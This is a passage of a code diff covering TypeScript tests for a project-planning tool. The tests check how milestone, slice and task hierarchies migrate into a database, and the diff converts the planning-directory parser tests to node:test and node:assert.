+      // M002: ghost — just an empty dir (no CONTEXT, ROADMAP, or SUMMARY)
+      mkdirSync(join(base, '.gsd', 'milestones', 'M002'), { recursive: true });
+
+      openDatabase(':memory:');
+      const counts = migrateHierarchyToDb(base);
+
+      assert.deepStrictEqual(counts.milestones, 1, 'ghost: only 1 milestone inserted');
+      const milestones = getAllMilestones();
+      assert.deepStrictEqual(milestones.length, 1, 'ghost: 1 milestone in DB');
+      assert.deepStrictEqual(milestones[0]!.id, 'M001', 'ghost: only M001 in DB');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (e): Idempotent re-run — calling twice doesn't duplicate ────
+
+test('migrate-hier: idempotent re-run', () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_2_SLICES);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_S01_3_TASKS);
+
+      openDatabase(':memory:');
+
+      // First run
+      const counts1 = migrateHierarchyToDb(base);
+      assert.deepStrictEqual(counts1.milestones, 1, 'idempotent-1: 1 milestone first run');
+      assert.deepStrictEqual(counts1.slices, 2, 'idempotent-1: 2 slices first run');
+      assert.deepStrictEqual(counts1.tasks, 3, 'idempotent-1: 3 tasks first run');
+
+      // Second run — INSERT OR IGNORE means no duplicates
+      const counts2 = migrateHierarchyToDb(base);
+      // Counts reflect attempts, not actual inserts (INSERT OR IGNORE silently skips)
+      // The important thing: DB doesn't have duplicates
+      const milestones = getAllMilestones();
+      assert.deepStrictEqual(milestones.length, 1, 'idempotent-2: still 1 milestone after second run');
+      const slices = getMilestoneSlices('M001');
+      assert.deepStrictEqual(slices.length, 2, 'idempotent-2: still 2 slices after second run');
+      const tasks = getSliceTasks('M001', 'S01');
+      assert.deepStrictEqual(tasks.length, 3, 'idempotent-2: still 3 tasks for S01 after second run');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (f): Empty roadmap — milestone inserted but no slices ───────
+
+test('migrate-hier: empty roadmap, no slices', () => {
+    const base = createFixtureBase();
+    try {
+      const emptyRoadmap = `# M001: Empty Milestone
+
+**Vision:** No slices here.
+
+## Slices
+
+(No slices defined yet)
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', emptyRoadmap);
+
+      openDatabase(':memory:');
+      const counts = migrateHierarchyToDb(base);
+
+      assert.deepStrictEqual(counts.milestones, 1, 'empty-roadmap: 1 milestone inserted');
+      assert.deepStrictEqual(counts.slices, 0, 'empty-roadmap: 0 slices inserted');
+      assert.deepStrictEqual(counts.tasks, 0, 'empty-roadmap: 0 tasks inserted');
+
+      const milestones = getAllMilestones();
+      assert.deepStrictEqual(milestones.length, 1, 'empty-roadmap: 1 milestone in DB');
+      assert.deepStrictEqual(milestones[0]!.title, 'M001: Empty Milestone', 'empty-roadmap: title correct');
+
+      const slices = getMilestoneSlices('M001');
+      assert.deepStrictEqual(slices.length, 0, 'empty-roadmap: no slices in DB');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (g): Slice depends parsed correctly ─────────────────────────
+
+test('migrate-hier: slice depends parsed', () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Deps Test
+
+**Vision:** Testing deps.
+
+## Slices
+
+- [ ] **S01: No Deps** \`risk:low\` \`depends:[]\`
+  > After this: S01 done.
+
+- [ ] **S02: Depends on S01** \`risk:medium\` \`depends:[S01]\`
+  > After this: S02 done.
+
+- [ ] **S03: Multi-Dep** \`risk:high\` \`depends:[S01,S02]\`
+  > After this: All done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      const slices = getMilestoneSlices('M001');
+      assert.deepStrictEqual(slices.length, 3, 'depends: 3 slices');
+      assert.deepStrictEqual(slices[0]!.depends, [], 'depends: S01 has no deps');
+      assert.deepStrictEqual(slices[1]!.depends, ['S01'], 'depends: S02 depends on S01');
+      assert.deepStrictEqual(slices[2]!.depends, ['S01', 'S02'], 'depends: S03 depends on S01,S02');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (h): Demo text extracted from roadmap ───────────────────────
+
+test('migrate-hier: demo text extracted', () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_2_SLICES);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      const slices = getMilestoneSlices('M001');
+      assert.deepStrictEqual(slices[0]!.demo, 'First slice done.', 'demo: S01 demo text correct');
+      assert.deepStrictEqual(slices[1]!.demo, 'All slices done.', 'demo: S02 demo text correct');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
diff --git a/src/resources/extensions/gsd/tests/migrate-parser.test.ts b/src/resources/extensions/gsd/tests/migrate-parser.test.ts
index c7d051da3..82d425292 100644
--- a/src/resources/extensions/gsd/tests/migrate-parser.test.ts
+++ b/src/resources/extensions/gsd/tests/migrate-parser.test.ts
@@ -10,9 +10,9 @@ import { parsePlanningDirectory } from '../migrate/parser.ts';
 import { validatePlanningDirectory } from '../migrate/validator.ts';
 
 import type { PlanningProject, ValidationResult } from '../migrate/types.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -241,11 +241,9 @@ Fixed the login button by correcting the touch event handler.
 // Test Groups
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
   // ─── Test 1: Complete .planning directory ──────────────────────────────
-  console.log('\n=== Complete .planning directory with all file types ===');
-  {
+
+test('Complete .planning directory with all file types', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -313,86 +311,86 @@ Dashboard needs auth to be complete first.
       const project = await parsePlanningDirectory(planning);
 
       // Top-level structure
-      assertEq(project.path, planning, 'project.path matches');
-      assertTrue(project.project !== null, 'PROJECT.md parsed');
-      assertTrue(project.roadmap !== null, 'ROADMAP.md parsed');
-      assertTrue(project.requirements.length > 0, 'requirements parsed');
-      assertTrue(project.state !== null, 'STATE.md parsed');
-      assertTrue(project.config !== null, 'config.json parsed');
+      assert.deepStrictEqual(project.path, planning, 'project.path matches');
+      assert.ok(project.project !== null, 'PROJECT.md parsed');
+      assert.ok(project.roadmap !== null, 'ROADMAP.md parsed');
+      assert.ok(project.requirements.length > 0, 'requirements parsed');
+      assert.ok(project.state !== null, 'STATE.md parsed');
+      assert.ok(project.config !== null, 'config.json parsed');
 
       // Phases
-      assertTrue('29-auth-system' in project.phases, 'phase 29 present');
-      assertTrue('30-dashboard' in project.phases, 'phase 30 present');
+      assert.ok('29-auth-system' in project.phases, 'phase 29 present');
+      assert.ok('30-dashboard' in project.phases, 'phase 30 present');
 
       const phase29 = project.phases['29-auth-system'];
-      assertEq(phase29?.number, 29, 'phase 29 number');
-      assertEq(phase29?.slug, 'auth-system', 'phase 29 slug');
-      assertTrue('01' in (phase29?.plans ?? {}), 'phase 29 has plan 01');
-      assertTrue('01' in (phase29?.summaries ?? {}), 'phase 29 has summary 01');
-      assertTrue((phase29?.research?.length ?? 0) > 0, 'phase 29 has research');
+      assert.deepStrictEqual(phase29?.number, 29, 'phase 29 number');
+      assert.deepStrictEqual(phase29?.slug, 'auth-system', 'phase 29 slug');
+      assert.ok('01' in (phase29?.plans ?? {}), 'phase 29 has plan 01');
+      assert.ok('01' in (phase29?.summaries ?? {}), 'phase 29 has summary 01');
+      assert.ok((phase29?.research?.length ?? 0) > 0, 'phase 29 has research');
 
       // Plan content (XML-in-markdown)
       const plan29 = phase29?.plans?.['01'];
-      assertTrue(plan29 !== undefined, 'plan 29-01 exists');
-      assertTrue(plan29?.objective?.includes('authentication') ?? false, 'plan objective extracted');
-      assertTrue((plan29?.tasks?.length ?? 0) >= 3, 'plan tasks extracted');
-      assertTrue(plan29?.context?.includes('JWT') ?? false, 'plan context extracted');
-      assertTrue(plan29?.verification !== '', 'plan verification extracted');
-      assertTrue(plan29?.successCriteria !== '', 'plan success criteria extracted');
+      assert.ok(plan29 !== undefined, 'plan 29-01 exists');
+      assert.ok(plan29?.objective?.includes('authentication') ?? false, 'plan objective extracted');
+      assert.ok((plan29?.tasks?.length ?? 0) >= 3, 'plan tasks extracted');
+      assert.ok(plan29?.context?.includes('JWT') ?? false, 'plan context extracted');
+      assert.ok(plan29?.verification !== '', 'plan verification extracted');
+      assert.ok(plan29?.successCriteria !== '', 'plan success criteria extracted');
 
       // Plan frontmatter
-      assertEq(plan29?.frontmatter?.phase, '29-auth-system', 'plan frontmatter phase');
-      assertEq(plan29?.frontmatter?.plan, '01', 'plan frontmatter plan');
-      assertEq(plan29?.frontmatter?.type, 'implementation', 'plan frontmatter type');
-      assertEq(plan29?.frontmatter?.wave, 1, 'plan frontmatter wave');
-      assertEq(plan29?.frontmatter?.autonomous, true, 'plan frontmatter autonomous');
+      assert.deepStrictEqual(plan29?.frontmatter?.phase, '29-auth-system', 'plan frontmatter phase');
+      assert.deepStrictEqual(plan29?.frontmatter?.plan, '01', 'plan frontmatter plan');
+      assert.deepStrictEqual(plan29?.frontmatter?.type, 'implementation', 'plan frontmatter type');
+      assert.deepStrictEqual(plan29?.frontmatter?.wave, 1, 'plan frontmatter wave');
+      assert.deepStrictEqual(plan29?.frontmatter?.autonomous, true, 'plan frontmatter autonomous');
 
       // Summary content
       const summary29 = phase29?.summaries?.['01'];
-      assertTrue(summary29 !== undefined, 'summary 29-01 exists');
-      assertEq(summary29?.frontmatter?.phase, '29-auth-system', 'summary frontmatter phase');
-      assertEq(summary29?.frontmatter?.plan, '01', 'summary frontmatter plan');
-      assertEq(summary29?.frontmatter?.subsystem, 'auth', 'summary frontmatter subsystem');
-      assertTrue((summary29?.frontmatter?.tags?.length ?? 0) >= 2, 'summary frontmatter tags');
-      assertTrue((summary29?.frontmatter?.provides?.length ?? 0) >= 2, 'summary frontmatter provides');
-      assertTrue((summary29?.frontmatter?.affects?.length ?? 0) >= 1, 'summary frontmatter affects');
-      assertTrue((summary29?.frontmatter?.['tech-stack']?.length ?? 0) >= 2, 'summary frontmatter tech-stack');
-      assertTrue((summary29?.frontmatter?.['key-files']?.length ?? 0) >= 2, 'summary frontmatter key-files');
-      assertTrue((summary29?.frontmatter?.['key-decisions']?.length ?? 0) >= 2, 'summary frontmatter key-decisions');
-      assertTrue((summary29?.frontmatter?.['patterns-established']?.length ?? 0) >= 1, 'summary frontmatter patterns-established');
-      assertEq(summary29?.frontmatter?.duration, '2h', 'summary frontmatter duration');
-      assertEq(summary29?.frontmatter?.completed, '2026-01-15', 'summary frontmatter completed');
+      assert.ok(summary29 !== undefined, 'summary 29-01 exists');
+      assert.deepStrictEqual(summary29?.frontmatter?.phase, '29-auth-system', 'summary frontmatter phase');
+      assert.deepStrictEqual(summary29?.frontmatter?.plan, '01', 'summary frontmatter plan');
+      assert.deepStrictEqual(summary29?.frontmatter?.subsystem, 'auth', 'summary frontmatter subsystem');
+      assert.ok((summary29?.frontmatter?.tags?.length ?? 0) >= 2, 'summary frontmatter tags');
+      assert.ok((summary29?.frontmatter?.provides?.length ?? 0) >= 2, 'summary frontmatter provides');
+      assert.ok((summary29?.frontmatter?.affects?.length ?? 0) >= 1, 'summary frontmatter affects');
+      assert.ok((summary29?.frontmatter?.['tech-stack']?.length ?? 0) >= 2, 'summary frontmatter tech-stack');
+      assert.ok((summary29?.frontmatter?.['key-files']?.length ?? 0) >= 2, 'summary frontmatter key-files');
+      assert.ok((summary29?.frontmatter?.['key-decisions']?.length ?? 0) >= 2, 'summary frontmatter key-decisions');
+      assert.ok((summary29?.frontmatter?.['patterns-established']?.length ?? 0) >= 1, 'summary frontmatter patterns-established');
+      assert.deepStrictEqual(summary29?.frontmatter?.duration, '2h', 'summary frontmatter duration');
+      assert.deepStrictEqual(summary29?.frontmatter?.completed, '2026-01-15', 'summary frontmatter completed');
 
       // Quick tasks
-      assertTrue(project.quickTasks.length >= 1, 'quick tasks parsed');
-      assertEq(project.quickTasks[0]?.number, 1, 'quick task number');
-      assertTrue(project.quickTasks[0]?.plan !== null, 'quick task has plan');
-      assertTrue(project.quickTasks[0]?.summary !== null, 'quick task has summary');
+      assert.ok(project.quickTasks.length >= 1, 'quick tasks parsed');
+      assert.deepStrictEqual(project.quickTasks[0]?.number, 1, 'quick task number');
+      assert.ok(project.quickTasks[0]?.plan !== null, 'quick task has plan');
+      assert.ok(project.quickTasks[0]?.summary !== null, 'quick task has summary');
 
       // Milestones
-      assertTrue(project.milestones.length >= 1, 'milestones parsed');
+      assert.ok(project.milestones.length >= 1, 'milestones parsed');
 
       // Root research
-      assertTrue(project.research.length >= 1, 'root research parsed');
+      assert.ok(project.research.length >= 1, 'root research parsed');
 
       // Config
-      assertEq(project.config?.projectName, 'test-project', 'config projectName');
+      assert.deepStrictEqual(project.config?.projectName, 'test-project', 'config projectName');
 
       // State
-      assertTrue(project.state?.currentPhase?.includes('30') ?? false, 'state current phase');
-      assertEq(project.state?.status, 'in-progress', 'state status');
+      assert.ok(project.state?.currentPhase?.includes('30') ?? false, 'state current phase');
+      assert.deepStrictEqual(project.state?.status, 'in-progress', 'state status');
 
       // Validation
-      assertEq(project.validation.valid, true, 'validation passes for complete dir');
-      assertEq(project.validation.issues.length, 0, 'no validation issues');
+      assert.deepStrictEqual(project.validation.valid, true, 'validation passes for complete dir');
+      assert.deepStrictEqual(project.validation.issues.length, 0, 'no validation issues');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 2: Minimal .planning directory (only ROADMAP.md) ─────────────
-  console.log('\n=== Minimal .planning directory (only ROADMAP.md) ===');
-  {
+
+test('Minimal .planning directory (only ROADMAP.md)', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -400,42 +398,42 @@ Dashboard needs auth to be complete first.
 
       const project = await parsePlanningDirectory(planning);
 
-      assertEq(project.project, null, 'minimal: PROJECT.md is null');
-      assertTrue(project.roadmap !== null, 'minimal: ROADMAP.md parsed');
-      assertEq(project.requirements.length, 0, 'minimal: no requirements');
-      assertEq(project.state, null, 'minimal: no state');
-      assertEq(project.config, null, 'minimal: no config');
-      assertEq(Object.keys(project.phases).length, 0, 'minimal: no phases');
-      assertEq(project.quickTasks.length, 0, 'minimal: no quick tasks');
-      assertEq(project.milestones.length, 0, 'minimal: no milestones');
-      assertEq(project.research.length, 0, 'minimal: no research');
-      assertEq(project.validation.valid, true, 'minimal: validation passes');
+      assert.deepStrictEqual(project.project, null, 'minimal: PROJECT.md is null');
+      assert.ok(project.roadmap !== null, 'minimal: ROADMAP.md parsed');
+      assert.deepStrictEqual(project.requirements.length, 0, 'minimal: no requirements');
+      assert.deepStrictEqual(project.state, null, 'minimal: no state');
+      assert.deepStrictEqual(project.config, null, 'minimal: no config');
+      assert.deepStrictEqual(Object.keys(project.phases).length, 0, 'minimal: no phases');
+      assert.deepStrictEqual(project.quickTasks.length, 0, 'minimal: no quick tasks');
+      assert.deepStrictEqual(project.milestones.length, 0, 'minimal: no milestones');
+      assert.deepStrictEqual(project.research.length, 0, 'minimal: no research');
+      assert.deepStrictEqual(project.validation.valid, true, 'minimal: validation passes');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 3: Missing directory → validation fatal error ────────────────
-  console.log('\n=== Missing directory → validation returns fatal error ===');
-  {
+
+test('Missing directory → validation returns fatal error', async () => {
     const base = createFixtureBase();
     try {
       const result = await validatePlanningDirectory(join(base, 'nonexistent'));
 
-      assertEq(result.valid, false, 'missing dir: validation fails');
-      assertTrue(result.issues.length > 0, 'missing dir: has issues');
-      assertTrue(
+      assert.deepStrictEqual(result.valid, false, 'missing dir: validation fails');
+      assert.ok(result.issues.length > 0, 'missing dir: has issues');
+      assert.ok(
         result.issues.some(i => i.severity === 'fatal'),
         'missing dir: has fatal issue'
       );
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 4: Duplicate phase numbers ───────────────────────────────────
-  console.log('\n=== Phase directory with duplicate numbers ===');
-  {
+
+test('Phase directory with duplicate numbers', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -456,18 +454,18 @@ Dashboard needs auth to be complete first.
 
       const project = await parsePlanningDirectory(planning);
 
-      assertTrue('45-core-infrastructure' in project.phases, 'dup nums: core-infrastructure phase present');
-      assertTrue('45-logging-config' in project.phases, 'dup nums: logging-config phase present');
-      assertEq(project.phases['45-core-infrastructure']?.number, 45, 'dup nums: both have number 45 (a)');
-      assertEq(project.phases['45-logging-config']?.number, 45, 'dup nums: both have number 45 (b)');
+      assert.ok('45-core-infrastructure' in project.phases, 'dup nums: core-infrastructure phase present');
+      assert.ok('45-logging-config' in project.phases, 'dup nums: logging-config phase present');
+      assert.deepStrictEqual(project.phases['45-core-infrastructure']?.number, 45, 'dup nums: both have number 45 (a)');
+      assert.deepStrictEqual(project.phases['45-logging-config']?.number, 45, 'dup nums: both have number 45 (b)');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 5: XML-in-markdown plan parsing ──────────────────────────────
-  console.log('\n=== Plan file with XML-in-markdown ===');
-  {
+
+test('Plan file with XML-in-markdown', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -480,21 +478,21 @@ Dashboard needs auth to be complete first.
       const project = await parsePlanningDirectory(planning);
       const plan = project.phases['29-auth-system']?.plans?.['01'];
 
-      assertTrue(plan !== undefined, 'xml plan: plan exists');
-      assertTrue(plan?.objective?.includes('authentication') ?? false, 'xml plan: objective extracted');
-      assertTrue((plan?.tasks?.length ?? 0) === 3, 'xml plan: 3 tasks extracted');
-      assertTrue(plan?.tasks?.[0]?.includes('auth middleware') ?? false, 'xml plan: first task content');
-      assertTrue(plan?.context?.includes('JWT') ?? false, 'xml plan: context extracted');
-      assertTrue(plan?.verification?.includes('Login returns') ?? false, 'xml plan: verification extracted');
-      assertTrue(plan?.successCriteria?.includes('endpoints respond') ?? false, 'xml plan: success criteria extracted');
+      assert.ok(plan !== undefined, 'xml plan: plan exists');
+      assert.ok(plan?.objective?.includes('authentication') ?? false, 'xml plan: objective extracted');
+      assert.ok((plan?.tasks?.length ?? 0) === 3, 'xml plan: 3 tasks extracted');
+      assert.ok(plan?.tasks?.[0]?.includes('auth middleware') ?? false, 'xml plan: first task content');
+      assert.ok(plan?.context?.includes('JWT') ?? false, 'xml plan: context extracted');
+      assert.ok(plan?.verification?.includes('Login returns') ?? false, 'xml plan: verification extracted');
+      assert.ok(plan?.successCriteria?.includes('endpoints respond') ?? false, 'xml plan: success criteria extracted');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 6: Summary file with YAML frontmatter ───────────────────────
-  console.log('\n=== Summary file with YAML frontmatter ===');
-  {
+
+test('Summary file with YAML frontmatter', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -507,27 +505,27 @@ Dashboard needs auth to be complete first.
       const project = await parsePlanningDirectory(planning);
       const summary = project.phases['29-auth-system']?.summaries?.['01'];
 
-      assertTrue(summary !== undefined, 'summary fm: summary exists');
-      assertEq(summary?.frontmatter?.phase, '29-auth-system', 'summary fm: phase');
-      assertEq(summary?.frontmatter?.plan, '01', 'summary fm: plan');
-      assertEq(summary?.frontmatter?.subsystem, 'auth', 'summary fm: subsystem');
-      assertEq(summary?.frontmatter?.tags, ['authentication', 'security'], 'summary fm: tags');
-      assertEq(summary?.frontmatter?.provides, ['auth-middleware', 'jwt-validation'], 'summary fm: provides');
-      assertEq(summary?.frontmatter?.affects, ['api-routes'], 'summary fm: affects');
-      assertEq(summary?.frontmatter?.['tech-stack'], ['jsonwebtoken', 'express'], 'summary fm: tech-stack');
-      assertEq(summary?.frontmatter?.['key-files'], ['src/auth.ts', 'src/middleware/auth.ts'], 'summary fm: key-files');
-      assertEq(summary?.frontmatter?.['key-decisions'], ['Use RS256 for JWT signing', 'Store refresh tokens in DB'], 'summary fm: key-decisions');
-      assertEq(summary?.frontmatter?.['patterns-established'], ['Middleware-based auth'], 'summary fm: patterns-established');
-      assertEq(summary?.frontmatter?.duration, '2h', 'summary fm: duration');
-      assertEq(summary?.frontmatter?.completed, '2026-01-15', 'summary fm: completed');
+      assert.ok(summary !== undefined, 'summary fm: summary exists');
+      assert.deepStrictEqual(summary?.frontmatter?.phase, '29-auth-system', 'summary fm: phase');
+      assert.deepStrictEqual(summary?.frontmatter?.plan, '01', 'summary fm: plan');
+      assert.deepStrictEqual(summary?.frontmatter?.subsystem, 'auth', 'summary fm: subsystem');
+      assert.deepStrictEqual(summary?.frontmatter?.tags, ['authentication', 'security'], 'summary fm: tags');
+      assert.deepStrictEqual(summary?.frontmatter?.provides, ['auth-middleware', 'jwt-validation'], 'summary fm: provides');
+      assert.deepStrictEqual(summary?.frontmatter?.affects, ['api-routes'], 'summary fm: affects');
+      assert.deepStrictEqual(summary?.frontmatter?.['tech-stack'], ['jsonwebtoken', 'express'], 'summary fm: tech-stack');
+      assert.deepStrictEqual(summary?.frontmatter?.['key-files'], ['src/auth.ts', 'src/middleware/auth.ts'], 'summary fm: key-files');
+      assert.deepStrictEqual(summary?.frontmatter?.['key-decisions'], ['Use RS256 for JWT signing', 'Store refresh tokens in DB'], 'summary fm: key-decisions');
+      assert.deepStrictEqual(summary?.frontmatter?.['patterns-established'], ['Middleware-based auth'], 'summary fm: patterns-established');
+      assert.deepStrictEqual(summary?.frontmatter?.duration, '2h', 'summary fm: duration');
+      assert.deepStrictEqual(summary?.frontmatter?.completed, '2026-01-15', 'summary fm: completed');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 7: Orphan summaries (no matching plan) ──────────────────────
-  console.log('\n=== Orphan summaries (no matching plan) ===');
-  {
+
+test('Orphan summaries (no matching plan)', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -561,19 +559,19 @@ Another orphan.
       const project = await parsePlanningDirectory(planning);
       const phase = project.phases['45-logging-config'];
 
-      assertTrue(phase !== undefined, 'orphan: phase exists');
-      assertEq(Object.keys(phase?.plans ?? {}).length, 0, 'orphan: no plans');
-      assertTrue(Object.keys(phase?.summaries ?? {}).length >= 2, 'orphan: summaries preserved');
-      assertTrue('04' in (phase?.summaries ?? {}), 'orphan: summary 04 present');
-      assertTrue('05' in (phase?.summaries ?? {}), 'orphan: summary 05 present');
+      assert.ok(phase !== undefined, 'orphan: phase exists');
+      assert.deepStrictEqual(Object.keys(phase?.plans ?? {}).length, 0, 'orphan: no plans');
+      assert.ok(Object.keys(phase?.summaries ?? {}).length >= 2, 'orphan: summaries preserved');
+      assert.ok('04' in (phase?.summaries ?? {}), 'orphan: summary 04 present');
+      assert.ok('05' in (phase?.summaries ?? {}), 'orphan: summary 05 present');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 8: .archive/ directory skipped ──────────────────────────────
-  console.log('\n=== .archive/ directory → skipped by default ===');
-  {
+
+test('.archive/ directory → skipped by default', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -591,17 +589,17 @@ Another orphan.
 
       const project = await parsePlanningDirectory(planning);
 
-      assertTrue('29-auth-system' in project.phases, 'archive: normal phase present');
+      assert.ok('29-auth-system' in project.phases, 'archive: normal phase present');
       // Archive phases should not appear in the phases map
-      assertTrue(!Object.keys(project.phases).some(k => k.includes('old-auth')), 'archive: archived phase not present');
+      assert.ok(!Object.keys(project.phases).some(k => k.includes('old-auth')), 'archive: archived phase not present');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 9: Quick tasks ──────────────────────────────────────────────
-  console.log('\n=== Quick tasks parsed ===');
-  {
+
+test('Quick tasks parsed', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -620,22 +618,22 @@ Another orphan.
 
       const project = await parsePlanningDirectory(planning);
 
-      assertEq(project.quickTasks.length, 2, 'quick: 2 quick tasks');
-      assertEq(project.quickTasks[0]?.number, 1, 'quick: first task number');
-      assertEq(project.quickTasks[0]?.slug, 'fix-login', 'quick: first task slug');
-      assertTrue(project.quickTasks[0]?.plan !== null, 'quick: first task has plan');
-      assertTrue(project.quickTasks[0]?.summary !== null, 'quick: first task has summary');
-      assertEq(project.quickTasks[1]?.number, 2, 'quick: second task number');
-      assertTrue(project.quickTasks[1]?.plan !== null, 'quick: second task has plan');
-      assertEq(project.quickTasks[1]?.summary, null, 'quick: second task has no summary');
+      assert.deepStrictEqual(project.quickTasks.length, 2, 'quick: 2 quick tasks');
+      assert.deepStrictEqual(project.quickTasks[0]?.number, 1, 'quick: first task number');
+      assert.deepStrictEqual(project.quickTasks[0]?.slug, 'fix-login', 'quick: first task slug');
+      assert.ok(project.quickTasks[0]?.plan !== null, 'quick: first task has plan');
+      assert.ok(project.quickTasks[0]?.summary !== null, 'quick: first task has summary');
+      assert.deepStrictEqual(project.quickTasks[1]?.number, 2, 'quick: second task number');
+      assert.ok(project.quickTasks[1]?.plan !== null, 'quick: second task has plan');
+      assert.deepStrictEqual(project.quickTasks[1]?.summary, null, 'quick: second task has no summary');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 10: Roadmap with milestone sections and <details> ────────────
-  console.log('\n=== Roadmap with milestone sections and <details> blocks ===');
-  {
+
+test('Roadmap with milestone sections and <details> blocks', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -643,35 +641,35 @@ Another orphan.
 
       const project = await parsePlanningDirectory(planning);
 
-      assertTrue(project.roadmap !== null, 'ms roadmap: roadmap parsed');
-      assertTrue((project.roadmap?.milestones?.length ?? 0) >= 2, 'ms roadmap: has milestone sections');
+      assert.ok(project.roadmap !== null, 'ms roadmap: roadmap parsed');
+      assert.ok((project.roadmap?.milestones?.length ?? 0) >= 2, 'ms roadmap: has milestone sections');
 
       // Check collapsed milestone
       const v20 = project.roadmap?.milestones?.find(m => m.id.includes('2.0'));
-      assertTrue(v20 !== undefined, 'ms roadmap: v2.0 milestone found');
-      assertEq(v20?.collapsed, true, 'ms roadmap: v2.0 is collapsed');
-      assertTrue((v20?.phases?.length ?? 0) >= 2, 'ms roadmap: v2.0 has phases');
-      assertTrue(v20?.phases?.every(p => p.done) ?? false, 'ms roadmap: v2.0 phases all done');
+      assert.ok(v20 !== undefined, 'ms roadmap: v2.0 milestone found');
+      assert.deepStrictEqual(v20?.collapsed, true, 'ms roadmap: v2.0 is collapsed');
+      assert.ok((v20?.phases?.length ?? 0) >= 2, 'ms roadmap: v2.0 has phases');
+      assert.ok(v20?.phases?.every(p => p.done) ?? false, 'ms roadmap: v2.0 phases all done');
 
       // Check active milestone
       const v25 = project.roadmap?.milestones?.find(m => m.id.includes('2.5'));
-      assertTrue(v25 !== undefined, 'ms roadmap: v2.5 milestone found');
-      assertEq(v25?.collapsed, false, 'ms roadmap: v2.5 is not collapsed');
-      assertTrue((v25?.phases?.length ?? 0) >= 3, 'ms roadmap: v2.5 has phases');
+      assert.ok(v25 !== undefined, 'ms roadmap: v2.5 milestone found');
+      assert.deepStrictEqual(v25?.collapsed, false, 'ms roadmap: v2.5 is not collapsed');
+      assert.ok((v25?.phases?.length ?? 0) >= 3, 'ms roadmap: v2.5 has phases');
 
       // Check completion state
       const phase29 = v25?.phases?.find(p => p.number === 29);
-      assertTrue(phase29?.done === true, 'ms roadmap: phase 29 is done');
+      assert.ok(phase29?.done === true, 'ms roadmap: phase 29 is done');
       const phase30 = v25?.phases?.find(p => p.number === 30);
-      assertTrue(phase30?.done === false, 'ms roadmap: phase 30 is not done');
+      assert.ok(phase30?.done === false, 'ms roadmap: phase 30 is not done');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 11: Non-standard phase files → extra files ──────────────────
-  console.log('\n=== Non-standard phase files → collected as extra files ===');
-  {
+
+test('Non-standard phase files → collected as extra files', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -687,28 +685,28 @@ Another orphan.
       const project = await parsePlanningDirectory(planning);
       const phase = project.phases['36-attachment-system'];
 
-      assertTrue(phase !== undefined, 'extra: phase exists');
-      assertTrue((phase?.extraFiles?.length ?? 0) >= 3, 'extra: non-standard files collected');
-      assertTrue(
+      assert.ok(phase !== undefined, 'extra: phase exists');
+      assert.ok((phase?.extraFiles?.length ?? 0) >= 3, 'extra: non-standard files collected');
+      assert.ok(
         phase?.extraFiles?.some(f => f.fileName === 'BASELINE.md') ?? false,
         'extra: BASELINE.md collected'
       );
-      assertTrue(
+      assert.ok(
         phase?.extraFiles?.some(f => f.fileName === 'BUNDLE-ANALYSIS.md') ?? false,
         'extra: BUNDLE-ANALYSIS.md collected'
       );
-      assertTrue(
+      assert.ok(
         phase?.extraFiles?.some(f => f.fileName === 'depcheck-results.txt') ?? false,
         'extra: depcheck-results.txt collected'
       );
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 12: Validation — missing ROADMAP.md → warning (not fatal) ───
-  console.log('\n=== Validation: missing ROADMAP.md → warning (not fatal) ===');
-  {
+
+test('Validation: missing ROADMAP.md → warning (not fatal)', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -717,19 +715,19 @@ Another orphan.
 
       const result = await validatePlanningDirectory(planning);
 
-      assertEq(result.valid, true, 'no roadmap: validation still passes');
